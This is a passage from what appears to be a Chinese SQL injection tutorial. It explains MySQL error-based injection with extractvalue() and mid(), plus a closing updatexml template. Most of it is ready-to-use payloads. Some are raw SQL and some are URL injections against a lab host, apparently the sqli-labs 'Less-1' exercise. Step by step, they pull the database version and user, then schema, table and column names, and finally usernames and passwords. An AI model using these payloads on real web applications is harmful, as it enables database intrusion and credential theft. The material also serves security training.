xml_frag
, xpath_expr
例如
SELECT extractvalue('xy','/a/b') as result
查询结果为
result |
---|
x y |
如果第二个参数书写错误
SELECT extractvalue('xy','#username') as result
报错如下
-- SELECT * from users WHERE id = 1 and extractvalue(1,mid(concat(0x23,(SELECT GROUP_CONCAT(username,':',`password`) from users),0x23),159,32))
SELECT extractvalue('xy','#username') as result
> 1105 - XPATH syntax error: '#username'
> 时间: 0.001s
利用此特性可以实现报错注入
由于此报错注入和updatexml都只能爆最大32位,如果要爆出32位之后的数据,需要借助mid函数进行字符截取从而显示32位以后的数据
参数 | 描述 |
---|---|
column_name | 必需。要提取字符的字段 |
start | 必需。开始位置 |
length | 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本 |
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat_ws(0x23,0x23,version(),user(),database(),@@version_compile_os,0x23),9,32))
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(schema_name) from information_schema.SCHEMATA),
0x23),50,32))
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(table_name) from information_schema.tables where table_schema = database()),
0x23),1,32))
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(COLUMN_NAME) from information_schema.`COLUMNS` where table_name = 'users'),
0x23),1,32))
SELECT * from users WHERE id = 1 and
extractvalue(1,
mid(concat(0x23,
(SELECT GROUP_CONCAT(username,':',`password`) from users),
0x23),1,32))
http://192.168.1.101/Less-1/?id=1' and
extractvalue(1,
concat_ws(0x23,0x23,version(),user(),database(),@@version_compile_os)
)%23
http://192.168.1.101/Less-1/?id=1'
and extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(schema_name) from information_schema.SCHEMATA),
0x23),1,32))--+
http://192.168.1.101/Less-1/?id=1'
and extractvalue(1,
mid(concat(0x23,(SELECT group_concat(table_name) from information_schema.tables where table_schema = database())
,0x23),1,32))--+
http://192.168.1.101/Less-1/?id=1' and
extractvalue(1,
mid(concat(0x23,
(SELECT group_concat(COLUMN_NAME) from information_schema.`COLUMNS` where table_name = 'users'),
0x23),1,32))--+
http://192.168.1.101/Less-1/?id=1' and
extractvalue(1,
mid(concat(0x23,
(SELECT GROUP_CONCAT(username,':',`password`) from users),
0x23),1,32))--+
XML_document
,XPath_String
,new_value
updatexml(1,concat(0x23,payload,0x23),1)